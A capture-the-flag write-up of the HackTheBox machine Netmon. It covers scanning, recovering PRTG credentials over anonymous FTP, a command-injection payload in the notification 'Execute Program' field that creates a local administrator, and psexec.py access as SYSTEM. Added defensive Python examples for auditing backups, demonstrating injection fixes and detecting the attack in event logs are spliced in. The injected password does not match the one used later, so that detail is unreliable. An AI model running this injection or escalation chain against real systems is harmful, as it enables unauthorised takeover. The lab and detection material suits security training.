#windows #hackthebox #easy
![[Pasted image 20250615134211.png]]
---
# Port Scanning - Nmap
Scanned all TCP ports to get an overview of which ports are open.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS 10.10.10.152 -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:49 CDT
Nmap scan report for 10.10.10.152
Host is up (0.050s latency).
Not shown: 64184 closed tcp ports (reset), 1338 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 18.53 seconds
```
Then I ran a second scan against only those open ports with the `-sC` and `-sV` options (default scripts and version detection).
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV 10.10.10.152 -p 21,80,135,139,445,5985,47001,49664-49669
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:52 CDT
Nmap scan report for 10.10.10.152
Host is up (0.050s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-06-15T18:53:49
|_ start_date: 2025-06-15T18:41:43
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.91 seconds
```
No open UDP ports, or at least none among the top 1,000. Note that nearly every port came back `open|filtered` (no response), so this is inconclusive rather than clean.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU 10.10.10.152 --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:57 CDT
Nmap scan report for 10.10.10.152
Host is up (0.058s latency).
Not shown: 999 open|filtered udp ports (no-response)
PORT STATE SERVICE
36384/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds
```
# Footprinting
### FTP 21
As we can see from the nmap output, FTP allows anonymous login. Let's take a look at the FTP server first.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ftp $IP
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:parallels): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50035|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
```
In `/Users/Public/Desktop` there is a `user.txt` and two `.lnk` files. I downloaded them, and `user.txt` turned out to be the actual user flag.
```bash
ftp> pwd
Remote directory: /Users/Public/Desktop
ftp> ls
229 Entering Extended Passive Mode (|||50059|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk
02-03-19 12:18AM 1160 PRTG Network Monitor.lnk
06-15-25 02:42PM 34 user.txt
226 Transfer complete.
```
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat user.txt
da47...
```
### HTTP 80
- I was prompted for credentials, but I haven't found any yet. Skipping this for now.
- I tried the default credentials `prtgadmin:prtgadmin` from https://www.exploit-db.com/exploits/46527, but they didn't work.
### SMB 445
Tried a null session with `smbclient`, but it didn't work. `smbmap` and `enum4linux` didn't reveal anything of interest either.
### HTTP 5985 & 47001
Both just return `Not Found`. These are the Microsoft HTTPAPI (WinRM) listeners, so there is nothing to browse here.
### FTP 21 - Again
At this point I couldn't get anywhere with any port except 21, so I logged back into the FTP server with the anonymous login.
This time I used `ls -la` to show everything, including hidden directories, and traversed into the `ProgramData` folder, where I found the `Paessler` and `PRTG Network Monitor` directories.
I downloaded all four files whose names start with `PRTG Configuration.` with `mget PRTG Configuration*`.
```bash
229 Entering Extended Passive Mode (|||50718|)
150 Opening ASCII mode data connection.
06-15-25 03:23PM <DIR> Configuration Auto-Backups
06-15-25 02:42PM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
06-15-25 02:42PM <DIR> Logs (Web Server)
06-15-25 02:47PM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
06-15-25 03:23PM 1680954 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
```
I looked through all four downloaded files and finally found a set of credentials inside `PRTG Configuration.old.bak`: `prtgadmin:PrTg@dmin2018`
![[Pasted image 20250615145017.png]]
Unfortunately, the password I found was still not valid.
![[Pasted image 20250615150430.png]]
Then I tried the password `PrTg@dmin2019` instead of "2018", and it worked. In hindsight this makes sense: the credentials came from a file named `PRTG Configuration.old.bak`, which is an "old" backup.
After successfully logging in, I was stuck for a long time, so I referred to `0xdf`'s writeup. The following exploit is therefore not original; it is based on `0xdf`'s writeup and others.
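The credential exposure above comes down to a plaintext secret sitting in a configuration backup on an anonymously readable FTP root. As an added example (not part of this writeup and not PRTG's own code), the Python script below audits a PRTG-style XML export for secret-looking elements whose value is stored in the clear, skipping entries marked `<encrypted/>` or stored in a `crypt=` cell. The embedded sample is constructed and only approximates the real file layout; the tag names and values in it are placeholders.

```python
import sys
import xml.etree.ElementTree as ET

# Tag-name fragments that usually hold a secret in monitoring/config exports.
SECRET_TAG_FRAGMENTS = ("password", "passphrase", "secret", "community")

# Constructed sample (assumption: approximates a PRTG configuration export).
# One plaintext <dbpassword>, one marked <encrypted/> with a crypt cell, and an
# SNMP community string. Values are placeholders, not real credentials.
SAMPLE_CONFIG = """<?xml version="1.0"?>
<root>
  <data>
    <login>prtgadmin</login>
    <dbpassword>
      EXAMPLE-PLAINTEXT
    </dbpassword>
    <dbpassword>
      <flags><encrypted/></flags>
      <cell col="0" crypt="PRTG">NOT-REAL-CIPHERTEXT</cell>
    </dbpassword>
    <snmpcommunity>public</snmpcommunity>
    <comments></comments>
  </data>
</root>
"""


def _looks_secret(tag: str) -> bool:
    tag = tag.lower()
    return any(fragment in tag for fragment in SECRET_TAG_FRAGMENTS)


def _is_marked_encrypted(elem: ET.Element) -> bool:
    """True if the element carries an <encrypted/> flag or a crypt= cell,
    i.e. the stored value is not the bare secret."""
    if elem.find("./flags/encrypted") is not None:
        return True
    return any("crypt" in child.attrib for child in elem.iter("cell"))


def find_plaintext_secrets(xml_text: str) -> list:
    """Return (path, value) for every secret-looking element whose own text is
    a non-empty value and which is not marked as encrypted."""
    root = ET.fromstring(xml_text)
    parent = {child: p for p in root.iter() for child in p}
    findings = []
    for elem in root.iter():
        if not _looks_secret(elem.tag):
            continue
        value = (elem.text or "").strip()
        if not value or _is_marked_encrypted(elem):
            continue
        # Build a readable path from the root down to this element.
        chain, cur = [], elem
        while cur is not None:
            chain.append(cur.tag)
            cur = parent.get(cur)
        findings.append(("/".join(reversed(chain)), value))
    return findings


def audit_file(path: str) -> list:
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return find_plaintext_secrets(fh.read())


if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets:
        results = [(p, audit_file(p)) for p in targets]
    else:
        results = [("<sample>", find_plaintext_secrets(SAMPLE_CONFIG))]
    for name, hits in results:
        for path, value in hits:
            print(f"{name}: {path} = {value[:4]}... (plaintext, {len(value)} chars)")
```

Run it against the downloaded backups with `python3 audit_prtg_backup.py 'PRTG Configuration.old.bak'`; without arguments it scans the embedded sample. The point for defenders is that rotating the live password (2018 to 2019) does not retire the value still sitting in the old backup, and an old password is often a near-miss for the current one, so backups need the same access control as the live configuration.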
Navigate to `Setup` -> `Notifications` (under Account Settings) and click the `+` sign to add a new notification.
Scroll to the bottom and check `Execute Program`. The Parameter field is the vulnerable input; the injection goes there.
We are going to inject the following into that field:
`test.txt;net user wook wook413 /add;net localgroup administrators wook /add`
Let me break down the command:
- `test.txt` is just a harmless placeholder value
- `;` is a command separator, which allows the commands that follow it to execute
- `net user wook wook413 /add`: adds a new user named `wook` with the password `wook413` to the system.
- `net localgroup administrators wook /add`: adds the newly created **wook** user to the **Administrators** group, giving it local admin privilege.
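The `;` in the Parameter field works because the value is spliced into a command line that a shell interprets. The Python block below is an added example, not PRTG code and not from this writeup: it contrasts the vulnerable string-concatenation pattern with an argv list plus input validation, using `echo` on a POSIX shell as a stand-in for the program a notification would launch and a harmless second `echo` as the injected command.

```python
import subprocess

# Characters a POSIX shell treats as separators/operators. Any of these in a
# value spliced into a shell command line can change the command structure.
SHELL_METACHARS = frozenset(";&|`$<>(){}\n\r")


def has_shell_metachars(value: str) -> bool:
    """Cheap input check: does the value contain shell control characters?"""
    return any(ch in SHELL_METACHARS for ch in value)


def run_unsafe(program: str, param: str) -> str:
    """Vulnerable pattern: the parameter is concatenated into a command string
    handed to a shell, so a ';' in the parameter starts a second command."""
    result = subprocess.run(f"{program} {param}", shell=True,
                            capture_output=True, text=True, check=False)
    return result.stdout


def run_argv_only(program: str, param: str) -> str:
    """Fix 1: pass an argv list and never invoke a shell. The entire parameter
    reaches the program as one argument, metacharacters included."""
    result = subprocess.run([program, param],
                            capture_output=True, text=True, check=False)
    return result.stdout


def run_safe(program: str, param: str) -> str:
    """Fix 2 (defence in depth): also reject control characters up front, so a
    downstream component that does use a shell can never see them."""
    if has_shell_metachars(param):
        raise ValueError(f"rejected parameter with shell metacharacters: {param!r}")
    return run_argv_only(program, param)


if __name__ == "__main__":
    # Assumption: a POSIX shell and an 'echo' binary on PATH. 'echo' stands in
    # for the notification's program; the injected value is a harmless second
    # echo, mirroring the ';' trick in the writeup.
    injected = "test.txt; echo INJECTED"
    print("shell=True ->", repr(run_unsafe("echo", injected)))
    print("argv list  ->", repr(run_argv_only("echo", injected)))
    try:
        run_safe("echo", injected)
    except ValueError as err:
        print("validated  ->", err)
```

With the shell form the first call prints two lines (`test.txt`, then `INJECTED`); with the argv form the whole string is printed back as one literal argument, and the validated form refuses it outright. The same separation applies to any product that lets a user-supplied field reach a command launcher.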
![[Pasted image 20250615151838.png]]
![[Pasted image 20250615155219.png]]
After hitting Save, you are back on this screen. Click the far-right icon of your newly created notification, then select the bell-shaped icon at the very top.
![[Pasted image 20250615154440.png]]
It says a test notification was triggered and queued for delivery.
![[Pasted image 20250615154614.png]]
After waiting a few seconds, I tried `smbclient` and `smbmap` with the newly created account `wook:w00k413!` to see whether listing shares would work, and it did!
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbclient -L //$IP/ -U 'wook%w00k413!'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
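From the defender's side, the sequence above leaves a distinctive trail in the Windows Security log: `net.exe` spawned by a non-interactive service, then event 4720 (user account created) followed within seconds by 4732 (member added to a security-enabled local group) targeting BUILTIN\Administrators, SID `S-1-5-32-544`. The Python block below is an added detection example, not part of the writeup or of any product. The event records are constructed: the parent process path is a placeholder and the account SIDs are made up, but the event IDs and field names are the standard Security-log ones.

```python
import re
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of BUILTIN\Administrators
NET_USER_ADD = re.compile(r"\buser\s+(?P<name>\S+)\s+\S+\s+/add\b", re.IGNORECASE)
NET_LOCALGROUP_ADD = re.compile(
    r"\blocalgroup\s+administrators\s+(?P<name>\S+)\s+/add\b", re.IGNORECASE)
# Parents from which an admin would plausibly type 'net user' by hand.
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_net_account_changes(events: list) -> list:
    """Flag 4688 process-creation events where net.exe/net1.exe adds a user or
    adds a member to Administrators; note whether the parent was interactive."""
    findings = []
    for ev in events:
        if ev["EventID"] != 4688:
            continue
        if _basename(ev["NewProcessName"]) not in {"net.exe", "net1.exe"}:
            continue
        match = NET_USER_ADD.search(ev["CommandLine"]) or \
            NET_LOCALGROUP_ADD.search(ev["CommandLine"])
        if not match:
            continue
        parent = _basename(ev["ParentProcessName"])
        findings.append({
            "time": ev["Time"],
            "account": match.group("name"),
            "subject": ev["SubjectUserName"],
            "parent": parent,
            "interactive_parent": parent in INTERACTIVE_PARENTS,
        })
    return findings


def detect_new_local_admins(events: list, window: timedelta = timedelta(minutes=5)) -> list:
    """Correlate 4720 (user created) with a later 4732 into Administrators for the
    same member SID within `window`. Returns (username, subject) pairs."""
    created = {}   # new account SID -> (username, creation time)
    hits = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (ev["TargetUserName"], ev["Time"])
        elif ev["EventID"] == 4732 and ev["TargetSid"] == ADMINISTRATORS_SID:
            entry = created.get(ev["MemberSid"])
            if entry and ev["Time"] - entry[1] <= window:
                hits.append((entry[0], ev["SubjectUserName"]))
    return hits


# Constructed sample events. NETMON$ is the machine account a SYSTEM service
# logs as; the parent path and SIDs are placeholders, not real values.
T0 = datetime(2025, 6, 15, 15, 18, 0)
NEW_USER_SID = "S-1-5-21-1111-2222-3333-1001"
SAMPLE_EVENTS = [
    {"EventID": 4688, "Time": T0, "SubjectUserName": "NETMON$",
     "NewProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user wook <redacted> /add",
     "ParentProcessName": r"C:\Placeholder\monitoring-service.exe"},
    {"EventID": 4720, "Time": T0 + timedelta(seconds=1), "SubjectUserName": "NETMON$",
     "TargetUserName": "wook", "TargetSid": NEW_USER_SID},
    {"EventID": 4688, "Time": T0 + timedelta(seconds=2), "SubjectUserName": "NETMON$",
     "NewProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net localgroup administrators wook /add",
     "ParentProcessName": r"C:\Placeholder\monitoring-service.exe"},
    {"EventID": 4732, "Time": T0 + timedelta(seconds=3), "SubjectUserName": "NETMON$",
     "TargetUserName": "Administrators", "TargetSid": ADMINISTRATORS_SID,
     "MemberName": "-", "MemberSid": NEW_USER_SID},
    # Benign noise: an interactive process that is not net.exe.
    {"EventID": 4688, "Time": T0 + timedelta(minutes=1), "SubjectUserName": "Administrator",
     "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in detect_net_account_changes(SAMPLE_EVENTS):
        print(f"[net.exe] {f['time']:%H:%M:%S} account={f['account']} "
              f"by={f['subject']} parent={f['parent']} interactive={f['interactive_parent']}")
    for user, subject in detect_new_local_admins(SAMPLE_EVENTS):
        print(f"[new local admin] {user} created and added to Administrators by {subject}")
```

The first rule alone is noisy on hosts where admins legitimately manage local accounts, which is why it records the parent: `net.exe` under a service binary, with the machine account as subject, is the part worth an alert. The second rule does not depend on process auditing at all, only on the default account-management events, so it still fires if 4688 command-line logging is off. Note that 4688 records the full command line, so the new account's password lands in the log too; the sample writes `<redacted>` in its place.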
Then with `smbmap`:
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbmap -H $IP -u wook -p 'w00k413!'
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[-] Enumerating shares...
[+] IP: 10.10.10.152:445 Name: 10.10.10.152 Status: ADMIN!!!
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ READ ONLY Remote IPC
```
From here there are many ways to get a shell as administrator; here I'll use `psexec.py`.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ psexec.py 'wook:w00k413!'@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file uSbNnSbL.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service IPZa on 10.10.10.152.....
[*] Starting service IPZa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
```
Found `root.txt`!
```powershell
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5
Directory of C:\Users\Administrator\Desktop
02/03/2019 12:35 AM <DIR> .
02/03/2019 12:35 AM <DIR> ..
06/15/2025 02:42 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,735,409,152 bytes free
C:\Users\Administrator\Desktop> type root.txt
a46b...
```